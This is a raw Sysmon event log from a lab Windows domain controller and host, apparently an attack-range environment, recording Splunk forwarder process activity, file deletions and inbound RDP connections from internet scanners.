15:01:02.510{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:02.510{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:02.510{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-ECAE-607E-770F-00000000BB01}6832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:02.510{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-ECAE-607E-770F-00000000BB01}6832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:02.511{A7A01FEF-ECAE-607E-770F-00000000BB01}6832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000082484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:01.345{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-48740-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:00.695{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com59891-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:00.686{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com55543-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000082481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:01.994{A7A01FEF-ECAD-607E-760F-00000000BB01}25084340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000051230Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:02.725{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08F23DADB7E69B68D5F8B18BAABD1A81,SHA256=9FDBE41B040EE41983E5141C6B51A0B93B1CF9380CBE6C984DE8FE8C7125AEA4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051229Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:00.702{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61455-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051228Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:59.776{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com54450-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:03.713{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DFED0C1E371817598DE629C60E45673,SHA256=5FAC531742C62548DF3539665D96970685558EE0ABD9C937976652C2C4E75126,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:02.245{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57678-false10.0.1.12-8000- 10341000x800000000000000082503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:03.338{A7A01FEF-ECAF-607E-780F-00000000BB01}58485060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:03.182{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-ECAF-607E-780F-00000000BB01}5848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:03.182{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:03.182{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:03.182{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:03.182{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:03.182{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-ECAF-607E-780F-00000000BB01}5848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:03.182{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-ECAF-607E-780F-00000000BB01}5848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:03.183{A7A01FEF-ECAF-607E-780F-00000000BB01}5848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000051231Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:03.741{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E639D51FA86E122A704CED96C5FE81AA,SHA256=C7E7F44FC890EC5C909B872B2146CB865C6E05D44F0F620DD7592009A2EC76C8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.994{A7A01FEF-ECB0-607E-7A0F-00000000BB01}62723508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.838{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-ECB0-607E-7A0F-00000000BB01}6272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.838{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.838{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.838{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.838{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.838{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-ECB0-607E-7A0F-00000000BB01}6272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.838{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-ECB0-607E-7A0F-00000000BB01}6272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.839{A7A01FEF-ECB0-607E-7A0F-00000000BB01}6272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.744{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F26E5C2790478C5EF49F717C8EC3A08A,SHA256=B1E450FF91BE3EF8D418FB65A413087503C526CD9B716C8704B97E57DAC49C6C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:02.976{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50099-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 